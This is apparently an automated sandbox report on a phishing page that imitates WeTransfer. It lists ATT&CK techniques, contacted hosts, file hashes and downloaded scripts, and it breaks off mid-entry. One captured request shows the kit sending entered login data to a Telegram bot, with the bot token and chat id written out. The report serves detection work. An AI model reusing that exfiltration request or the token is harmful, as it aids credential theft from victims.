Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation3
Browser Extensions
1
Process Injection
3
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Web Service
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://connexion-espacesclients.support/gkm/100%Avira URL Cloudphishing
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
connexion-espacesclients.support
172.67.212.110
truefalse
    high
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      challenges.cloudflare.com
      104.18.94.41
      truefalse
        high
        cdn.tailwindcss.com
        172.67.41.16
        truefalse
          high
          cdn.wetransfer.com
          18.66.161.101
          truefalse
            high
            www.google.com
            142.250.181.100
            truefalse
              high
              wetransfer.com
              18.66.161.92
              truefalse
                high
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://connexion-espacesclients.support/gkm/true
                    unknown
                    https://connexion-espacesclients.support/gkm/?__cf_chl_rt_tk=ikmDfOrsD_3PGWhiFgfOsLgIkMRFnIf6Cg1queg1K08-1733219199-1.0.1.1-pjQs1POxFuUapvCSUYkqFSNZD0TR_nfsaK15qyYdMpEtrue
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      172.217.19.206
                      unknownUnited States
                      15169GOOGLEUSfalse
                      18.66.161.101
                      cdn.wetransfer.comUnited States
                      3MIT-GATEWAYSUSfalse
                      172.67.41.16
                      cdn.tailwindcss.comUnited States
                      13335CLOUDFLARENETUSfalse
                      172.217.17.46
                      unknownUnited States
                      15169GOOGLEUSfalse
                      172.217.17.35
                      unknownUnited States
                      15169GOOGLEUSfalse
                      104.18.94.41
                      challenges.cloudflare.comUnited States
                      13335CLOUDFLARENETUSfalse
                      216.58.208.227
                      unknownUnited States
                      15169GOOGLEUSfalse
                      104.18.95.41
                      unknownUnited States
                      13335CLOUDFLARENETUSfalse
                      104.22.21.144
                      unknownUnited States
                      13335CLOUDFLARENETUSfalse
                      142.250.181.100
                      www.google.comUnited States
                      15169GOOGLEUSfalse
                      149.154.167.220
                      api.telegram.orgUnited Kingdom
                      62041TELEGRAMRUfalse
                      74.125.205.84
                      unknownUnited States
                      15169GOOGLEUSfalse
                      239.255.255.250
                      unknownReserved
                      unknownunknownfalse
                      104.21.37.192
                      unknownUnited States
                      13335CLOUDFLARENETUSfalse
                      18.66.161.92
                      wetransfer.comUnited States
                      3MIT-GATEWAYSUSfalse
                      172.217.17.74
                      unknownUnited States
                      15169GOOGLEUSfalse
                      35.190.80.1
                      a.nel.cloudflare.comUnited States
                      15169GOOGLEUSfalse
                      18.66.161.49
                      unknownUnited States
                      3MIT-GATEWAYSUSfalse
                      172.67.212.110
                      connexion-espacesclients.supportUnited States
                      13335CLOUDFLARENETUSfalse
                      IP
                      192.168.2.17
                      192.168.2.16
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1567263
                      Start date and time:2024-12-03 10:46:07 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                      Sample URL:https://connexion-espacesclients.support/gkm/
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:13
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • EGA enabled
                      Analysis Mode:stream
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal76.phis.troj.win@22/25@34/171
                      • Exclude process from analysis (whitelisted): svchost.exe
                      • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.17.46, 74.125.205.84, 34.104.35.123
                      • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                      • Not all processes where analyzed, report is missing behavior information
                      • VT rate limit hit for: https://connexion-espacesclients.support/gkm/
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 3 08:46:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2673
                      Entropy (8bit):3.9851727272569892
                      Encrypted:false
                      SSDEEP:
                      MD5:30088DA69871EFDEEDEC2C0D3566C8A4
                      SHA1:0BB1DCC597E972C30BA26956C881CA6663E44D11
                      SHA-256:78AB9856224DA574E614206D5B9212BF930D0BA6C546E1E300585E00402CC9FC
                      SHA-512:F76B0DA223FD20F883530474449F077CE447472DF0F694436DA3A25C4D439F970585DD7EF80307206E5D9B18FA9F7DEFA9071BBCE9AD30608617E13025170CA6
                      Malicious:false
                      Reputation:unknown
                      Preview:L..................F.@.. ...$+.,.....w.>hE..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.M....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.M....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.M....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.M..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.M...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Y=.>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 3 08:46:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2675
                      Entropy (8bit):4.001638619706081
                      Encrypted:false
                      SSDEEP:
                      MD5:A7BDF8D6077D7B381E1C6B9BE45F9B0B
                      SHA1:7B445C3363C2E79B3DFAE2EB1C47A59028962443
                      SHA-256:24CE917B0B0542BECD99D4F5A73EDA8082E9B493016A4FA4A2AC707B10361ED1
                      SHA-512:83197E011C4D9BE5FC516F2D7BE1432ADE6710619BD98B76415DAD29354D68DD03330D4B25981B00A7E5D9F1A3F8FE3354A4B083C43AFBB411EF05B12FDC3285
                      Malicious:false
                      Reputation:unknown
                      Preview:L..................F.@.. ...$+.,.....{.>hE..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.M....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.M....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.M....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.M..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.M...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Y=.>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2689
                      Entropy (8bit):4.0084650542337785
                      Encrypted:false
                      SSDEEP:
                      MD5:06FF9C4BAD8CDDC993441569A5A8C4AE
                      SHA1:2B4BE0A801725659DC352F4B4F21F545EFBD0988
                      SHA-256:64F3755D2BFC02243308E01BD442DEDBAC93D6FB2A36E37FC5832077B8CE9CCB
                      SHA-512:6BC39A4ABED263AF2C48B2E153749E88EA9B940BB76228693A29AD99CFA9B70521E0C2BB1A41E7EFBD4434E0098C6868E187995B301CF488B03E7D1264C03F70
                      Malicious:false
                      Reputation:unknown
                      Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.M....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.M....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.M....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.M..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Y=.>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 3 08:46:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2677
                      Entropy (8bit):3.9982441766261223
                      Encrypted:false
                      SSDEEP:
                      MD5:B1D182F9EFA1DBF29E479E4492F83694
                      SHA1:1C8DFCC7732C64B4765290EBC5681607EAF90E16
                      SHA-256:AAC314047D974E0D02CC0F46F32AE5A73C734001CF3F0FA12112BD0B6034FD72
                      SHA-512:9AE0CED38C40F34E0956E655EE8D894030AB9597202B9A5F41EB85C464E648EED6870911DB98A38CBF65518C3ACE43FDF09BFB1E4B91533BB85EEDC48D34A33A
                      Malicious:false
                      Reputation:unknown
                      Preview:L..................F.@.. ...$+.,.......>hE..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.M....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.M....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.M....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.M..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.M...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Y=.>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 3 08:46:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2677
                      Entropy (8bit):3.9855323955442232
                      Encrypted:false
                      SSDEEP:
                      MD5:5BD08318093A2D87551C8BF87814340D
                      SHA1:69DE467157FEA03FE6528AE3574AEC87E5A67C5B
                      SHA-256:5806113A5C5CF1F32AF21AA3E513B3C296DBD8973C39D1D0FA41B1E519CE9FCC
                      SHA-512:7E81C283250D77FAF23793EF04C022167BD7229173700966EB3D53D7238760D6B86F6B5AA3AD156CB4EA78159E2F499726A0946424A34B44398C1C52C0B3D619
                      Malicious:false
                      Reputation:unknown
                      Preview:L..................F.@.. ...$+.,.....G.>hE..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.M....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.M....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.M....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.M..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.M...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Y=.>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 3 08:46:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2679
                      Entropy (8bit):3.9948042619291586
                      Encrypted:false
                      SSDEEP:
                      MD5:9AB47201C8DFB4B84615D38303839453
                      SHA1:560F032EFA9AA63C69AA0F464E6209CBF7B68DAE
                      SHA-256:392BF74BB9D3A360B2EA7CC93E562B900BF5164158F2176C7083BF5E578D0D73
                      SHA-512:E84A719F739FDA2D280E7154BEE1AB5EDEC40B0A0302FFDF9A775AAEB6501611372342022C440880CB6D75014EDEA38C759CE6D8BA396E7F3331AB97EC97CE25
                      Malicious:false
                      Reputation:unknown
                      Preview:L..................F.@.. ...$+.,....@.>hE..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.M....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.M....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.M....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.M..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.M...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Y=.>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:JSON data
                      Category:downloaded
                      Size (bytes):395
                      Entropy (8bit):4.782818136224428
                      Encrypted:false
                      SSDEEP:
                      MD5:C68060335D40987C3E5F9857ED860CCA
                      SHA1:3DEA7368F402B0873722898B00C963202270C0C2
                      SHA-256:2FC83B61C2980505FD2E9DA7268E199FCC2ED49D9DF80993A5749200683334AA
                      SHA-512:75436E87C594BE7931205D0EF374D333E0FE380C96464898DA74D132E3C78F19D931E86F2A4C36FDABD6609C842AC84A85CB025C80ED4284CD23B849999E32B7
                      Malicious:false
                      Reputation:unknown
                      URL:https://api.telegram.org/bot7499623592:AAG4sRR7YzmOAFkZFFwiAbBsnnHB-lXYLSk/sendMessage?chat_id=1411469413&text=%F0%9F%8E%96%EF%B8%8F%F0%9F%92%B0%20-%20tutuutututututu%40iledefrance.fr%3Atutututututututututututu
                      Preview:{"ok":true,"result":{"message_id":1757,"from":{"id":7499623592,"is_bot":true,"first_name":"wetranchocobot","username":"wetranchocobot_bot"},"chat":{"id":1411469413,"first_name":"Pita","username":"gonpita10","type":"private"},"date":1733219307,"text":"\ud83c\udf96\ufe0f\ud83d\udcb0 - tutuutututututu@iledefrance.fr:tutututututututututututu","entities":[{"offset":8,"length":30,"type":"email"}]}}
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text
                      Category:downloaded
                      Size (bytes):315
                      Entropy (8bit):5.0572271090563765
                      Encrypted:false
                      SSDEEP:
                      MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                      SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                      SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                      SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                      Malicious:false
                      Reputation:unknown
                      URL:https://connexion-espacesclients.support/favicon.ico
                      Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (8946)
                      Category:downloaded
                      Size (bytes):8999
                      Entropy (8bit):5.466782773174583
                      Encrypted:false
                      SSDEEP:
                      MD5:877CE10DC5519261469F5E99AEEEA24F
                      SHA1:E415DE1F3979BC2F63867F631B7FE6A8ACE5C0E0
                      SHA-256:7EA9D75FA39F91A990C7005B27E14D88FF66A76F3D1659F6E66ED8557FB24FCC
                      SHA-512:3A55E0D520B2D87F7BC45BD1C42EAF5ABDE30F90C6618C2D8989EEE482549E94B3AD63F8208A70890E08A090EC0D588A5C977F0C3401158EF616D77B248658D5
                      Malicious:false
                      Reputation:unknown
                      URL:https://cdn.wetransfer.com/_next/static/chunks/webpack-24079c2749c7de8f.js
                      Preview:!function(){"use strict";var e={},t={};function c(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={id:n,loaded:!1,exports:{}},f=!0;try{e[n].call(r.exports,r,r.exports,c),f=!1}finally{f&&delete t[n]}return r.loaded=!0,r.exports}c.m=e,c.amdO={},function(){var e=[];c.O=function(t,n,a,r){if(!n){var f=1/0;for(i=0;i<e.length;i++){n=e[i][0],a=e[i][1],r=e[i][2];for(var d=!0,o=0;o<n.length;o++)(!1&r||f>=r)&&Object.keys(c.O).every((function(e){return c.O[e](n[o])}))?n.splice(o--,1):(d=!1,r<f&&(f=r));if(d){e.splice(i--,1);var b=a();void 0!==b&&(t=b)}}return t}r=r||0;for(var i=e.length;i>0&&e[i-1][2]>r;i--)e[i]=e[i-1];e[i]=[n,a,r]}}(),c.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return c.d(t,{a:t}),t},function(){var e,t=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__};c.t=function(n,a){if(1&a&&(n=this(n)),8&a)return n;if("object"===typeof n&&n){if(4&a&&n.__esModule)return n;if(16&a&&"function"===ty
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (26464)
                      Category:downloaded
                      Size (bytes):26518
                      Entropy (8bit):5.4041533878294405
                      Encrypted:false
                      SSDEEP:
                      MD5:87BD43A0F67DF806AF68EC16AF14CB9B
                      SHA1:8D0F13CA7DF0CE6E5F13D01F6387AC6FB1B125B8
                      SHA-256:222F9FFA24E24CBF81370C05BBA429A55B98C2639E28715C83C5B6BD760644D7
                      SHA-512:079A525A6CB50CB2D62D05D9ED9F923E4C1740F91D0603A9C6409B0DF98DEAB7FC1ADAE07D72F74C3856EDA96135CE3ECEB4F566FAB21687FF9F3280A99EBBE0
                      Malicious:false
                      Reputation:unknown
                      URL:https://cdn.wetransfer.com/_next/static/chunks/dde21195-6c6c00cfa3825e3c.js
                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[620],{44526:function(t,e,a){var n;function r(){return n||(n=URL.createObjectURL(new Blob(["(".concat(i,")(self)")]))),new Worker(n)}function i(){function t(t){return function(){try{return t.apply(this,arguments)}catch(e){try{self.postMessage({type:"errored",error:e})}catch(a){self.postMessage({type:"errored",error:"".concat(e)})}}}}t((function(){var e=function(){var t=4,e=0,a=1,n=2;function r(t){for(var e=t.length;--e>=0;)t[e]=0}var i=0,s=1,_=2,h=3,l=258,o=29,d=256,u=d+1+o,f=30,c=19,p=2*u+1,g=15,w=16,b=7,v=256,m=16,y=17,k=18,z=new Uint8Array([0,0,0,0,0,0,0,0,1,1,1,1,2,2,2,2,3,3,3,3,4,4,4,4,5,5,5,5,0]),x=new Uint8Array([0,0,0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8,9,9,10,10,11,11,12,12,13,13]),A=new Uint8Array([0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,3,7]),E=new Uint8Array([16,17,18,0,8,7,9,6,10,5,11,4,12,3,13,2,14,1,15]),Z=512,U=new Array(2*(u+2));r(U);var R=new Array(2*f);r(R);var S=new Array(Z);r(S);var L=new Array(l-h+1);r(L
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (8788), with no line terminators
                      Category:dropped
                      Size (bytes):8788
                      Entropy (8bit):5.734112779959566
                      Encrypted:false
                      SSDEEP:
                      MD5:83E52F8FDCDE6C82B388295A13EF7A4B
                      SHA1:C75B07EF03094FF323BC3C8C6BABB960AC8E5E00
                      SHA-256:22B11CCD47B658E493EB15426F687580FB1ADDE5B285E9FAA81856256AAB3145
                      SHA-512:19508B361E3E09D7F8B74DE9C3F6EED97105EC3390E6739D7293B88A5C71D3EE918CEBDC8864664BD7985AAE7EC05468C0E8F9B25D50D8BF7342BC967FE17512
                      Malicious:false
                      Reputation:unknown
                      Preview:window._cf_chl_opt={cFPWv:'b'};~function(X,h,i,j,k,o,s,B,D){X=b,function(d,e,W,f,g){for(W=b,f=d();!![];)try{if(g=-parseInt(W(256))/1*(parseInt(W(211))/2)+-parseInt(W(207))/3*(-parseInt(W(191))/4)+parseInt(W(204))/5*(-parseInt(W(253))/6)+parseInt(W(196))/7+-parseInt(W(167))/8+parseInt(W(144))/9+-parseInt(W(197))/10*(-parseInt(W(171))/11),e===g)break;else f.push(f.shift())}catch(F){f.push(f.shift())}}(a,210117),h=this||self,i=h[X(260)],j={},j[X(162)]='o',j[X(177)]='s',j[X(259)]='u',j[X(224)]='z',j[X(235)]='n',j[X(239)]='I',j[X(218)]='b',k=j,h[X(146)]=function(g,F,G,H,a2,J,K,L,M,N,O){if(a2=X,F===null||void 0===F)return H;for(J=n(F),g[a2(230)][a2(147)]&&(J=J[a2(209)](g[a2(230)][a2(147)](F))),J=g[a2(210)][a2(156)]&&g[a2(157)]?g[a2(210)][a2(156)](new g[(a2(157))](J)):function(P,a3,Q){for(a3=a2,P[a3(208)](),Q=0;Q<P[a3(236)];P[Q]===P[Q+1]?P[a3(237)](Q+1,1):Q+=1);return P}(J),K='nAsAaAb'.split('A'),K=K[a2(250)][a2(152)](K),L=0;L<J[a2(236)];M=J[L],N=m(g,F,M),K(N)?(O=N==='s'&&!g[a2(190)](F[M]),a2
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:PNG image data, 35 x 22, 8-bit/color RGB, non-interlaced
                      Category:dropped
                      Size (bytes):61
                      Entropy (8bit):4.068159130770306
                      Encrypted:false
                      SSDEEP:
                      MD5:7D02A37061AEB81435543EFFDB06C188
                      SHA1:523CA13C7619D8359ABB1D4073B24F4C7A3E4B45
                      SHA-256:AD590AF437011A57BB04371B9E915BFA462E5E6A39B3FDC0476BFA2902D1C7EA
                      SHA-512:403FB73ECBAA64A32E09657CD728FDD6A9F7790CD800AF5B7BA489A216D325B810BE1CBA582BE51EB65D5E9A601F5EA304EE1DC838D494340DCD7965436FC089
                      Malicious:false
                      Reputation:unknown
                      Preview:.PNG........IHDR...#.................IDAT.....$.....IEND.B`.
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (65536), with no line terminators
                      Category:downloaded
                      Size (bytes):104669
                      Entropy (8bit):5.3281806480535305
                      Encrypted:false
                      SSDEEP:
                      MD5:8135B1C2F278433EE0474F97F2AABFC6
                      SHA1:67A7538810D4A1439477386638A437161D2BD615
                      SHA-256:F585FCA547DB0E4F45281E2AAF119AD41D4C9DB22291F7363E2F58CFC76E385A
                      SHA-512:43A8EC343EE3C52933F97CEB0C6F4DA92BF53C6E2520397F6546BA7798BE7BC7A77EC6AFFFE86A707A76933EBA856552DD7A53141658CCCCCAC4E5FC921BA1F7
                      Malicious:false
                      Reputation:unknown
                      URL:https://cdn.wetransfer.com/_next/static/chunks/main-63f63e43320749d4.js
                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{5651:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=new Array(t);r<t;r++)n[r]=e[r];return n}},47568:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e){if(Array.isArray(e))return e}},61476:function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e){if(Array.isArray(e))return a.default(e)};var n,a=(n=r(5651))&&n.__esModule?n:{default:n}},96385:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e){if(void 0===e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}},18282:function(e,t){"use strict";function r(e,t,r,n,a,o,i){try{var u=e[o](i),c=u.value}catch(s){return void r(s)}u.done?t(c):Promise.resolve(c).then(n,a)}t.Z=function(e){return function(){var t=
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (47694)
                      Category:downloaded
                      Size (bytes):47695
                      Entropy (8bit):5.401531363850578
                      Encrypted:false
                      SSDEEP:
                      MD5:1685878B80EECB073E51C13F17A5E530
                      SHA1:0FFFA666F98F2D8C1156D46D7F9AB90C5B089AF3
